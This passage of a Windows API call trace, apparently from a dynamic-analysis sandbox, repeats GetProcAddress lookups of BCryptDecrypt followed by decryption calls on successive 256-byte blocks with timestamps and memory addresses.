lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.593] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7ded0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204217a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204217a, pcbResult=0x14f8fc) returned 0x0 [0173.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.594] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7dfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204226f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204226f, pcbResult=0x14f8fc) returned 0x0 [0173.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.596] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042364, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042364, pcbResult=0x14f8fc) returned 0x0 [0173.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.597] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042459, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042459, pcbResult=0x14f8fc) returned 0x0 [0173.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.599] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204254e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204254e, pcbResult=0x14f8fc) returned 0x0 [0173.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.600] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042643, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042643, pcbResult=0x14f8fc) returned 0x0 [0173.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.690] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042738, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042738, pcbResult=0x14f8fc) returned 0x0 [0173.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.691] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204282d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204282d, pcbResult=0x14f8fc) returned 0x0 [0173.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.693] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042922, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042922, pcbResult=0x14f8fc) returned 0x0 [0173.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.695] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042a17, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042a17, pcbResult=0x14f8fc) returned 0x0 [0173.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.696] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042b0c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042b0c, pcbResult=0x14f8fc) returned 0x0 [0173.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.698] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7e9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042c01, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042c01, pcbResult=0x14f8fc) returned 0x0 [0173.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.700] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7ead0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042cf6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042cf6, pcbResult=0x14f8fc) returned 0x0 [0173.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.702] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7ebd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042deb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042deb, pcbResult=0x14f8fc) returned 0x0 [0173.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.705] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7ecd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042ee0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042ee0, pcbResult=0x14f8fc) returned 0x0 [0173.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.707] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7edd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042fd5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042fd5, pcbResult=0x14f8fc) returned 0x0 [0173.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.710] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7eed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20430ca, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20430ca, pcbResult=0x14f8fc) returned 0x0 [0173.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.712] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7efd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20431bf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20431bf, pcbResult=0x14f8fc) returned 0x0 [0173.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.716] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20432b4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20432b4, pcbResult=0x14f8fc) returned 0x0 [0173.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.719] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20433a9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20433a9, pcbResult=0x14f8fc) returned 0x0 [0173.721] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.721] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204349e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204349e, pcbResult=0x14f8fc) returned 0x0 [0173.723] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.723] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043593, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043593, pcbResult=0x14f8fc) returned 0x0 [0173.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.814] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043688, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043688, pcbResult=0x14f8fc) returned 0x0 [0173.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.817] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204377d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204377d, pcbResult=0x14f8fc) returned 0x0 [0173.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.819] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043872, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043872, pcbResult=0x14f8fc) returned 0x0 [0173.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.821] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043967, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043967, pcbResult=0x14f8fc) returned 0x0 [0173.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.823] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043a5c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043a5c, pcbResult=0x14f8fc) returned 0x0 [0173.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.825] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7f9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043b51, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043b51, pcbResult=0x14f8fc) returned 0x0 [0173.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.827] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7fad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043c46, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043c46, pcbResult=0x14f8fc) returned 0x0 [0173.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.829] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7fbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043d3b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043d3b, pcbResult=0x14f8fc) returned 0x0 [0173.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.831] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7fcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043e30, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043e30, pcbResult=0x14f8fc) returned 0x0 [0173.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.833] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7fdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2043f25, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2043f25, pcbResult=0x14f8fc) returned 0x0 [0173.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.836] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7fed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204401a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204401a, pcbResult=0x14f8fc) returned 0x0 [0173.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.838] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7ffd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204410f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204410f, pcbResult=0x14f8fc) returned 0x0 [0173.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.840] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e800d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2044204, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2044204, pcbResult=0x14f8fc) returned 0x0 [0173.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.842] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e801d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20442f9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20442f9, pcbResult=0x14f8fc) returned 0x0 [0173.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.845] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e802d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20443ee, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20443ee, pcbResult=0x14f8fc) returned 0x0 [0173.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.983] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e803d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20444e3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20444e3, pcbResult=0x14f8fc) returned 0x0 [0173.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.986] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e804d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20445d8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20445d8, pcbResult=0x14f8fc) returned 0x0 [0173.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.988] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e805d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20446cd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20446cd, pcbResult=0x14f8fc) returned 0x0 [0173.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.990] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e806d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20447c2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20447c2, pcbResult=0x14f8fc) returned 0x0 [0173.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.992] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e807d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20448b7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20448b7, pcbResult=0x14f8fc) returned 0x0 [0174.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.005] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e808d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20449ac, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20449ac, pcbResult=0x14f8fc) returned 0x0 [0174.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.007] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e809d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2044aa1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2044aa1, pcbResult=0x14f8fc) returned 0x0 [0174.009] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.009] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e80ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2044b96, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2044b96, pcbResult=0x14f8fc) returned 0x0 [0174.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.011] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e80bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2044c8b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2044c8b, pcbResult=0x14f8fc) returned 0x0 [0174.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.013] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e80cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2044d80, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2044d80, pcbResult=0x14f8fc) returned 0x0 [0174.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.016] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e80dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2044e75, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2044e75, pcbResult=0x14f8fc) returned 0x0 [0174.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.018] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e80ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2044f6a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2044f6a, pcbResult=0x14f8fc) returned 0x0 [0174.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.020] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e80fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204505f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204505f, pcbResult=0x14f8fc) returned 0x0 [0174.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.022] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e810d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045154, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045154, pcbResult=0x14f8fc) returned 0x0 [0174.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.024] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e811d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045249, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045249, pcbResult=0x14f8fc) returned 0x0 [0174.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.026] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e812d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204533e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204533e, pcbResult=0x14f8fc) returned 0x0 [0174.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.122] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e813d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045433, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045433, pcbResult=0x14f8fc) returned 0x0 [0174.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.124] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e814d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045528, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045528, pcbResult=0x14f8fc) returned 0x0 [0174.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.127] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e815d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204561d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204561d, pcbResult=0x14f8fc) returned 0x0 [0174.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.129] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e816d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045712, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045712, pcbResult=0x14f8fc) returned 0x0 [0174.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.132] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e817d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2045807, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2045807, pcbResult=0x14f8fc) returned 0x0 [0174.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.134] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e818d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20458fc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20458fc, pcbResult=0x14f8fc) returned 0x0 [0174.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.136] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e819d0, cbInput=0x100, pPaddingInfo=0x0, 